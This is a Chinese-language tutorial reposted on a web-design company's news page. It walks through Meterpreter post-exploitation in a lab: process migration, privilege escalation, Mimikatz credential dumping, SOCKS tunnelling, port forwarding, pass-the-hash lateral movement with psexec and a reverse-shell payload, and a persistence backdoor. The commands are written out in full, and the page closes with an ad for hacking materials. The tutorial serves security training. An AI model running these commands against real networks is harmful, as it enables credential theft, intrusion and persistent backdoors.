恒美微站
首页
关于我们
建站服务
主题模板
案例展示
资讯中心
联系我们
Meterpreter 后渗透实战,内网横向移动入门
首页
资讯中心
/
Meterpreter 后渗透实战,内网横向移动入门
Meterpreter 后渗透实战,内网横向移动入门
发布时间:2026/9/29 13:04:26
Meterpreter 后渗透实战内网横向移动入门前言拿到 Meterpreter 会话只是渗透的起点而不是终点。很多新手利用永恒之蓝拿到靶机 shell 之后不知道下一步该干什么以为拿到一台机器就完成渗透。而**后渗透Post Exploitation**的核心目标就是拿下第一台跳板机之后收集内网信息、抓取账号凭证、搭建网络隧道横向渗透内网中其他主机扩大攻击面。Meterpreter 是 Metasploit 内置的高级 Payload它不是普通 cmd shell支持进程迁移、内存加载插件、凭证抓取、端口转发、路由隧道等强大能力。本文基于 Windows 靶场Blue 靶机 / Metasploitable完整演示会话基础操作、权限提升、内网信息收集、凭证抓取、路由隧道搭建、端口转发以及经典的哈希传递 PTH 横向移动。所有操作仅限本地虚拟机靶场或拥有书面授权的演练环境。免责声明本文仅用于网络安全学习。严禁在未授权内网、公网主机执行后渗透、凭证抓取、横向移动操作违规行为触犯《网络安全法》承担法律责任。一、环境说明与前置回顾攻击机Kali Linux跳板机已拿下Windows7IP192.168.172.148已获取 Meterpreter 会话内网另一台靶机192.168.172.149同网段 Windows 主机445 端口开放前置上一篇 NmapMSF 文章已经通过永恒之蓝 MS17-010 拿到跳板机的 meterpreter 会话。进入 msfconsole成功拿到会话界面meterpreter Meterpreter 基础常用命令# 查看帮助 ? # 获取系统信息 sysinfo # 查看当前用户权限 getuid # 查看网络网卡信息 ipconfig # 查看路由表 route # 查看进程列表 ps # 上传文件到目标 upload /root/test.exe C:\Windows\Temp\ # 下载文件到攻击机 download C:\Windows\System32\drivers\etc\hosts /root/ # 后台挂起当前会话回到msf控制台 background # 切换回会话session后面跟会话ID sessions -i 1二、进程迁移 migrate后渗透第一步必做Meterpreter 默认注入在漏洞利用创建的临时进程中如果进程关闭会话直接断开。所以拿到会话第一件事迁移到系统稳定进程保证会话持久。执行 ps 查看进程列表找到稳定系统进程例如explorer.exe、winlogon.exemeterpreter ps迁移到指定 PIDmeterpreter migrate 1234或者直接按进程名迁移新版 meterpreter 支持meterpreter migrate -N explorer.exe迁移成功提示Migration completed successfully。注意迁移需要足够权限如果当前不是 SYSTEM 权限会失败需要先提权。三、权限提升拿到 SYSTEM 最高权限Windows 下很多操作抓取内存密码、读取 SAM 哈希都需要 SYSTEM 权限。方法 1getsystem 一键提权Meterpreter 内置meterpreter getsystem原理尝试多种 Windows 本地提权技术自动提升到系统权限。执行完再getuid看到NT AUTHORITY\SYSTEM代表成功。方法 2bypassuac 模块普通管理员权限绕过 UAC如果 getsystem 失败可以后台会话调用 bypassuac 模块。meterpreter background msf6 use exploit/windows/local/bypassuac_injection msf6 exploit(bypassuac_injection) set SESSION 1 msf6 exploit(bypassuac_injection) run执行成功拿到新的高权限 meterpreter 会话。四、内网信息收集跳板机内部探查拿到跳板机高权限之后第一步不是直接横向而是先摸清内网拓扑。# 查看网卡、网段判断是否多网卡存在其他内网段 ipconfig # 查看arp缓存查看跳板机曾经访问过哪些内网机器 arp # 查看目标机器网络连接 netstat -anoMeterpreter 内置脚本扫描同网段存活主机meterpreter run post/multi/gather/arp_scanner RHOSTS192.168.172.0/24脚本会利用跳板机去扫描同网段存活 IP找出内网其他主机。收集完网段信息之后我们发现内网还有另一台机器192.168.172.149。攻击机原本可以直接访问实战场景中很多内网主机只能跳板机访问攻击机无法直接连通这时就需要搭建路由隧道。五、凭证抓取获取账号密码 / NTLM 哈希横向移动核心横向移动本质就是拿着 A 机器上抓取到的账号凭证去登录 B 机器。两种最常用方式hashdump 抓取 SAM 本地哈希、load kiwi 加载 Mimikatz 抓取内存凭据。1. hashdump 读取 SAM 数据库本地账号 NTLM 哈希必须 SYSTEM 权限。meterpreter hashdump输出格式用户名:RID:LM哈希:NT哈希:::Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::NTLM 哈希就是我们用于哈希传递Pass-the-HashPTH的凭证。拿到这个哈希不需要明文密码就可以在内网访问同账号的其他 Windows 主机。2. load kiwi调用 Mimikatz 抓取内存凭据推荐kiwi 是 Meterpreter 内置的 Mimikatz 扩展直接在内存运行不需要上传 mimikatz.exe 落地文件不容易被杀毒软件捕获。meterpreter load kiwi # 导出所有可用凭据明文密码、哈希、kerberos票据 meterpreter creds_all # 导出lsass内存登录密码 meterpreter kiwi_cmd sekurlsa::logonpasswords # 导出SAM账号哈希 meterpreter kiwi_cmd lsadump::samsekurlsa::logonpasswords可以直接读出内存中保存的明文账号密码如果用户最近登录过就能直接拿到明文。重要提示Windows10 1709 之后默认开启 LSA 保护很难直接抓取明文但 NTLM 哈希仍然可以尝试哈希传递。六、内网隧道搭建Autoroute SOCKS 代理跨网段跳板实战场景攻击机只能访问跳板机 192.168.172.148内网另一个网段10.0.0.0/24只能跳板机访问攻击机无法直达。此时需要路由转发 SOCKS 代理让 Kali 的 Nmap、Proxychains 全部流量经过跳板机访问内网。步骤 1Meterpreter 添加路由 autoroute在 meterpreter 会话内执行 autoroute把内网网段路由绑定到当前会话。meterpreter run autoroute -s 192.168.172.0/24 # 查看路由表 meterpreter run autoroute -p执行background把会话放到后台。步骤 2MSF 开启 socks_proxy 代理msf6 use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) set SRVPORT 1080 msf6 auxiliary(server/socks_proxy) set SRVHOST 127.0.0.1 msf6 auxiliary(server/socks_proxy) set VERSION 5 # -j后台持续运行 msf6 auxiliary(server/socks_proxy) run -jjobs 命令可以查看后台运行的代理任务。步骤 3配置 proxychainsKali 工具走代理访问内网修改/etc/proxychains4.conf文件末尾添加socks5 127.0.0.1 1080保存退出。之后所有工具加proxychains4前缀流量就会经过跳板机访问内网。# 通过跳板机对内网主机扫描 proxychains4 nmap -sT -Pn -p445,3389 192.168.172.149注意nmap 扫描 socks 代理只能使用 TCP 扫描-sT不能使用 SYN 扫描-sS。七、端口转发 portfwd单独映射内网端口如果只需要访问内网某一台机器的单个端口例如内网 Web、RDP3389使用 portfwd 端口转发不用全局 socks 代理。在 meterpreter 会话执行# 将内网192.168.172.149的3389端口映射到攻击机本地1234端口 meterpreter portfwd add -l 1234 -p 3389 -r 192.168.172.149参数说明-l攻击机本地监听端口-p目标内网主机端口-r内网目标 IP之后在 Kali 访问本机 1234 端口流量会转发到内网主机 3389RDP。查看转发规则portfwd list删除转发规则portfwd delete -l 1234八、横向移动实战PTH 哈希传递攻击最经典入门横向原理Windows 的 NTLM 认证验证的是 NTLM 哈希不一定需要明文密码。拿到 Administrator 的 NTLM 哈希只要目标主机开启 445本地管理员账号相同就可以直接登录拿到新的 Meterpreter 会话。前置条件目标 Windows 主机 445 端口开放开启 Admin$ 默认共享账号本地管理员账号名一致操作步骤后台挂起当前 meterpreter 会话meterpreter background加载 psexec 模块使用哈希传递msf6 use exploit/windows/smb/psexec msf6 exploit(psexec) set RHOSTS 192.168.172.149 # 用户名Administrator msf6 exploit(psexec) set SMBUser Administrator # SMBPass填写 LMhash:NThash msf6 exploit(psexec) set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 # 设置payload msf6 exploit(psexec) set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(psexec) set LHOST 192.168.172.131 msf6 exploit(psexec) set LPORT 4444 msf6 exploit(psexec) exploit成功执行直接拿到第二台内网主机的 Meterpreter 会话横向移动成功拿到新会话之后就可以重复整套流程迁移进程、提权、抓取这台机器的凭证继续向内网深处横向。补充如果不需要拿到 shell仅执行一条命令可以用auxiliary/admin/smb/psexec_command模块用哈希执行系统命令。九、持久化简单入门靶场练习渗透拿到权限之后为了防止会话断开可以添加自启动后门实现持久化。实战红队谨慎使用等保 / 渗透测试项目一般清理后门。# meterpreter内置persistence持久化脚本老模块仅靶场练习 run persistence -X -i 10 -p 5555 -r 192.168.172.131-X开机自启-i每 10 秒尝试回连-p回连端口生产环境 / 正式渗透测试结束必须清除后门痕迹不允许遗留持久化木马。十、完整后渗透 横向移动实战链路总结获取 Meterpreter 会话 → 进程迁移 migrate防止会话断开getsystem 提权拿到 SYSTEM 权限ipconfig/arp 扫描收集内网网段信息hashdump /load kiwi 抓取账号、NTLM 哈希autoroute 添加内网路由搭建 socks 代理打通内网访问通道对内网其他主机扫描确认 445 端口开放使用 psexec PTH 哈希传递横向拿下第二台主机在新主机重复整套流程持续扩大内网权限十一、新手高频踩坑点❌ 坑 1migrate 迁移失败getsystem 提权失败权限不足。普通用户无法迁移系统进程需要管理员 / SYSTEM 权限新版 Windows 补丁会阻止部分提权方式。❌ 坑 2哈希传递 Pth 失败目标 445 端口关闭、防火墙拦截Windows 2012 默认限制本地管理员哈希传递LSA 保护Admin$ 共享被组策略关闭哈希复制错误LM 和 NT 哈希中间冒号不能丢。❌ 坑 3autoroute 添加路由之后直接 nmap -sS 扫描内网socks 代理不支持 SYN 半连接扫描只能使用-sTTCP 全连接扫描。❌ 坑 4代理开启但是无法访问内网机器确认 autoroute 网段填写正确目标防火墙是否拦截proxychains 配置文件末尾 socks5 地址端口是否正确。❌ 坑 5直接对公网主机执行凭证抓取、横向移动严重违法仅限本地虚拟机靶场练习。十二、学习建议先吃透 Meterpreter 基础命令理解进程迁移、提权原理不要直接复制命令一把梭。先在单网段靶场练习哈希传递再练习跨网段路由隧道。区分两个概念端口转发 portfwd单端口映射、socks 代理全局流量隧道。横向移动不是只有 PTH后续还可以学习 PTT 票据传递、WMI、SMBexec 等多种方式。渗透测试讲究痕迹管理正式项目操作完成后清理日志、删除上传文件不留后门。总结Meterpreter 的后渗透是内网渗透的核心。拿到初始 shell 只是入口进程迁移、权限提升、内网信息收集、凭证抓取、隧道搭建、横向移动构成完整攻击链。哈希传递 PTH 是入门最简单的横向技术核心思路就是拿下一台机器 → 偷凭证 → 用凭证拿下内网其他机器。理解这套思路才算真正入门内网渗透而不是只会跑漏洞利用模块。一句话记住信息收集抓凭证路由打通内网凭证用来横向。以上就是今天的分享觉得有帮助记得点赞收藏以上所说到的漏洞扫描工具都整理成压缩包了朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】同时还为准备学习网络安全黑客或者正在学习整理了一套360独家内部资料包含以下内容如有需要也可文末获取①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】